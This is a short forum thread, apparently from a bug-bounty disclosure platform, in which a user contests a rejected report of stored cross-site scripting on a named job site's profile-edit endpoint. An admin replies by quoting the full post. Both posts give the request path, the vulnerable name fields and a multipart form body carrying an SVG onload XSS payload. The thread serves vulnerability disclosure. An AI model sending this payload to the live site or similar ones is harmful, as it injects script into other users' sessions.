Page 1 of 1

Rejected Submissions Issuse.

Posted: Sat Jul 10, 2021 2:18 pm
by Manojkhd
Hi, OBB team my reject ID: 2074677 the πŸ‘‰Vulnearble XSS web: www.kumarijob.com and πŸ‘‰POST /jobseeker/dashboard/update-profile HTTP/1.1 then πŸ‘‰path referer: https://www.kumarijob.com/jobseeker/dashboard/personal πŸ’₯step by next step reduce login to the account so path : /jobseeker/dashboard πŸ§—goto to the ✍"Edit Profile" > Edit Basic Information the πŸ•΅vulnearble parmaeter are: Fullname, Middel Name, Last Name is effect, Cross site scripting (XSS) the πŸ‘†post data download below let check out!πŸ‘€
----------------------------------------------------------------------------------------------------------

-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"

"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"

MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"

LN Vuln Payload
i hope soon as posiable to my πŸ’š"On Hold Vulnerabilities" thank you OBB πŸ‘

Re: Rejected Submissions Issuse.

Posted: Tue Jul 13, 2021 7:15 am
by x1admin
Manojkhd wrote: ↑
Sat Jul 10, 2021 2:18 pm
Hi, OBB team my reject ID: 2074677 the πŸ‘‰Vulnearble XSS web: www.kumarijob.com and πŸ‘‰POST /jobseeker/dashboard/update-profile HTTP/1.1 then πŸ‘‰path referer: https://www.kumarijob.com/jobseeker/dashboard/personal πŸ’₯step by next step reduce login to the account so path : /jobseeker/dashboard πŸ§—goto to the ✍"Edit Profile" > Edit Basic Information the πŸ•΅vulnearble parmaeter are: Fullname, Middel Name, Last Name is effect, Cross site scripting (XSS) the πŸ‘†post data download below let check out!πŸ‘€
----------------------------------------------------------------------------------------------------------

-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"

"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"

MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"

LN Vuln Payload
i hope soon as posiable to my πŸ’š"On Hold Vulnerabilities" thank you OBB πŸ‘
our contact form have report examples, please look